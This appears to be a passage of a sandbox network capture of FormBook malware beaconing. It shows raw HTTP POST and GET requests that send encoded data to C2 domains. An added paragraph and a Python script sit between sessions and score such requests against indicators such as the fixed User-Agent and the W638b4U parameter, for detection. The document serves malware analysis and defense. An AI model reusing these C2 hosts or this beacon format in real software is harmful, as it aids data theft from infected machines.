                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:26.467741966 CET | 571 bytes | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTFjNDEzNTItMWU1ZC00NzllLTk0NDMtYmY3NTIyNzFlNmI2IiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49989 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:28.362704992 CET | 1673 bytes | OUT | POST /d26j/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  Origin: http://www.vnxoso88.art
                                                                                                                                                  Referer: http://www.vnxoso88.art/d26j/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 45 56 66 72 55 46 45 35 6b 74 34 41 75 4b 6f 6c 4e 74 72 31 48 4b 67 4f 57 44 38 6d 41 76 35 52 46 4d 72 47 61 77 67 62 54 61 4b 6d 7a 48 32 4d 39 75 76 66 30 35 36 42 53 35 34 77 72 69 65 69 53 56 48 7a 72 44 2b 7a 6d 45 66 37 61 43 6f 6e 57 46 30 49 6b 54 67 59 41 75 4d 45 52 35 30 68 65 53 54 55 44 4d 47 68 75 56 79 33 4e 77 49 6a 30 36 78 2b 67 4a 67 41 54 36 56 32 76 79 71 69 6b 44 55 7a 68 65 58 39 50 57 75 5a 44 74 74 71 49 5a 48 38 67 56 7a 45 51 57 33 67 49 4f 6a 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=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 [TRUNCATED]
Nov 14, 2024 15:40:28.977226973 CET | 1236 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:27 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1118
                                                                                                                                                  x-request-id: f1d3f218-e422-41ec-9b03-65b0b2db5281
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                                                                                                  set-cookie: parking_session=f1d3f218-e422-41ec-9b03-65b0b2db5281; expires=Thu, 14 Nov 2024 14:55:28 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:28.977330923 CET | 571 bytes | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjFkM2YyMTgtZTQyMi00MWVjLTliMDMtNjViMGIyZGI1MjgxIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49991 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:30.902249098 CET | 381 bytes | OUT | GET /d26j/?W638b4U=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN1iJSRG9yUGoI2tAgRBkFBhEuTNxXB6UGYS0PM3LmZFBqDA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:40:31.521033049 CET | 1236 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:31 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1494
                                                                                                                                                  x-request-id: 031db4ea-a57b-4809-ac52-1659b6b8ea5c
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_p1xJXN0LcHq+7IiiJA28KHnkIiWJeqqhmXQCigVotsqCn8BB7YVgpPNzjTZFIRxlpSToe1UT7SZb4VahcihEeA==
                                                                                                                                                  set-cookie: parking_session=031db4ea-a57b-4809-ac52-1659b6b8ea5c; expires=Thu, 14 Nov 2024 14:55:31 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 31 78 4a 58 4e 30 4c 63 48 71 2b 37 49 69 69 4a 41 32 38 4b 48 6e 6b 49 69 57 4a 65 71 71 68 6d 58 51 43 69 67 56 6f 74 73 71 43 6e 38 42 42 37 59 56 67 70 50 4e 7a 6a 54 5a 46 49 52 78 6c 70 53 54 6f 65 31 55 54 37 53 5a 62 34 56 61 68 63 69 68 45 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_p1xJXN0LcHq+7IiiJA28KHnkIiWJeqqhmXQCigVotsqCn8BB7YVgpPNzjTZFIRxlpSToe1UT7SZb4VahcihEeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:31.521059036 CET | 947 bytes | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDMxZGI0ZWEtYTU3Yi00ODA5LWFjNTItMTY1OWI2YjhlYTVjIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49992 | 209.74.64.58 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:36.726937056 CET | 639 bytes | OUT | POST /afcr/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  Origin: http://www.pluribiz.life
                                                                                                                                                  Referer: http://www.pluribiz.life/afcr/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 54 48 49 6c 66 36 4b 34 4b 2b 59 43 4c 69 57 68 64 50 78 5a 43 54 59 50 32 33 50 56 71 46 55 69 4f 37 42 47 34 63 3d
                                                                                                                                                  Data Ascii: W638b4U=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fTHIlf6K4K+YCLiWhdPxZCTYP23PVqFUiO7BG4c=
Nov 14, 2024 15:40:37.381683111 CET | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:37 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


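Neither destination is a live C2 at capture time: www.vnxoso88.art (199.59.243.227) answers every beacon with a domain-parking page (note the parking_session cookie and the x-adblock-key header), and www.pluribiz.life (209.74.64.58) returns an Apache 404. What identifies the family is the request side, which is identical across both hosts: the same User-Agent string, a short random path (/d26j/, /afcr/), an Origin/Referer pair that points back at the beacon URL itself, Connection: close together with Cache-Control: max-age=0, and a single form or query parameter named W638b4U carrying a base64-looking blob, reused unchanged when the domain rotates. The Python script below is an added example and is not part of the Joe Sandbox report: it re-types three of the requests above (the /d26j/ POST body shortened) plus one constructed benign request, parses them, and scores each against those indicators. The indicator names, the threshold of three indicators, and the benign request are my assumptions; the GET beacon scores lower because it carries neither Origin/Referer nor Cache-Control.

```python
"""Score captured HTTP requests against the FormBook beacon shape seen above.

Added example, not part of the Joe Sandbox report. The three beacon texts are
re-typed from the capture (the /d26j/ POST body is shortened); the benign
request, the indicator names and the threshold are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# User-Agent string sent in every request of the capture above
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # raw (not URL-encoded) base64
PATH_RE = re.compile(r"^/[a-z0-9]{3,5}/$")        # /d26j/, /afcr/


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: Dict[str, str]   # header names lower-cased
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.1 request (CRLF or LF line endings)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body.strip())


def extract_params(req: HttpRequest) -> List[Tuple[str, str]]:
    """(name, value) pairs from the POST body or the GET query string.
    Split by hand: parse_qsl() would turn '+' into a space and break base64."""
    data = req.body if req.method == "POST" else req.target.partition("?")[2]
    pairs = []
    for chunk in data.split("&"):
        if "=" in chunk:
            name, value = chunk.split("=", 1)
            pairs.append((name, value))
    return pairs


def looks_like_b64_blob(value: str, min_len: int = 32) -> bool:
    """Base64 alphabet, padding only at the end, length a multiple of four."""
    return len(value) >= min_len and len(value) % 4 == 0 and bool(B64_RE.match(value))


def score_request(req: HttpRequest) -> List[str]:
    """List the beacon indicators this request matches (empty for a clean one)."""
    h = req.headers
    host = h.get("host", "")
    path = req.target.partition("?")[0]
    hits: List[str] = []
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("fixed_user_agent")
    if PATH_RE.match(path):
        hits.append("short_random_path")
    if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
        hits.append("self_referencing_origin")
    if h.get("connection", "").lower() == "close" and h.get("cache-control") == "max-age=0":
        hits.append("close_and_max_age_0")
    params = extract_params(req)
    if params and looks_like_b64_blob(params[0][1]):
        hits.append("base64_blob_in_first_param")
    return hits


def find_beacons(raw_requests: List[str], min_hits: int = 3
                 ) -> Tuple[List[Tuple[str, str, List[str]]], Dict[str, Set[str]]]:
    """Flag requests with >= min_hits indicators and group flagged hosts by the
    parameter name, which stays constant while the C2 domain rotates."""
    flagged: List[Tuple[str, str, List[str]]] = []
    hosts_by_param: Dict[str, Set[str]] = {}
    for raw in raw_requests:
        req = parse_request(raw)
        hits = score_request(req)
        if len(hits) < min_hits:
            continue
        host = req.headers.get("host", "")
        flagged.append((host, req.target, hits))
        params = extract_params(req)
        if params:
            hosts_by_param.setdefault(params[0][0], set()).add(host)
    return flagged, hosts_by_param


# Constructed inputs: three requests re-typed from the capture, one benign request.
REQ_POST_D26J = (
    "POST /d26j/ HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n"
    "Cache-Control: max-age=0\nConnection: close\nHost: www.vnxoso88.art\n"
    "Origin: http://www.vnxoso88.art\nReferer: http://www.vnxoso88.art/d26j/\n"
    f"User-Agent: {FORMBOOK_UA}\n\n"
    "W638b4U=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqN"  # shortened
)
REQ_GET_D26J = (
    "GET /d26j/?W638b4U=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2Nh"
    "iKrdBAMHfcdZvgkmH1tO/OhN1iJSRG9yUGoI2tAgRBkFBhEuTNxXB6UGYS0PM3LmZFBqDA==&Xll=50hLc0Hhy"
    " HTTP/1.1\nAccept: */*\nConnection: close\nHost: www.vnxoso88.art\n"
    f"User-Agent: {FORMBOOK_UA}\n\n"
)
REQ_POST_AFCR = (
    "POST /afcr/ HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n"
    "Cache-Control: max-age=0\nConnection: close\nHost: www.pluribiz.life\n"
    "Origin: http://www.pluribiz.life\nReferer: http://www.pluribiz.life/afcr/\n"
    f"User-Agent: {FORMBOOK_UA}\n\n"
    "W638b4U=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/id"
    "w30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7"
    "EVo+4LlM5t5uYnHkVkg9fTHIlf6K4K+YCLiWhdPxZCTYP23PVqFUiO7BG4c="
)
REQ_BENIGN = (  # constructed, ordinary browser request
    "GET /index.html HTTP/1.1\nHost: www.example.com\nAccept: text/html\n"
    "Connection: keep-alive\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36\n\n"
)
SAMPLE_REQUESTS = [REQ_POST_D26J, REQ_GET_D26J, REQ_POST_AFCR, REQ_BENIGN]

if __name__ == "__main__":
    flagged, hosts = find_beacons(SAMPLE_REQUESTS)
    for host, target, hits in flagged:
        print(f"{host} {target[:24]}... indicators={hits}")
    print("hosts sharing a parameter name:", hosts)
```

The grouping by parameter name is the part worth keeping in a real detection: the domains in this capture are throwaway (one parked, one dead), but the field name and the User-Agent travel with the sample, so a rule keyed on them survives the next domain rotation while a host-based indicator does not.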
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49993 | 209.74.64.58 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:39.269735098 CET | 659 bytes | OUT | POST /afcr/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  Origin: http://www.pluribiz.life
                                                                                                                                                  Referer: http://www.pluribiz.life/afcr/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 2f 67 66 6c 2f 34 45 61 6b 39 34 74 72 78 59 76 4a 51 72 70 78 53 57 51 57 56 44 59 73 75 30 6f 4c 6b 48 73 50 68
                                                                                                                                                  Data Ascii: W638b4U=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKi/gfl/4Eak94trxYvJQrpxSWQWVDYsu0oLkHsPh
                                                                                                                                                   Nov 14, 2024 15:40:39.943690062 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:39 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 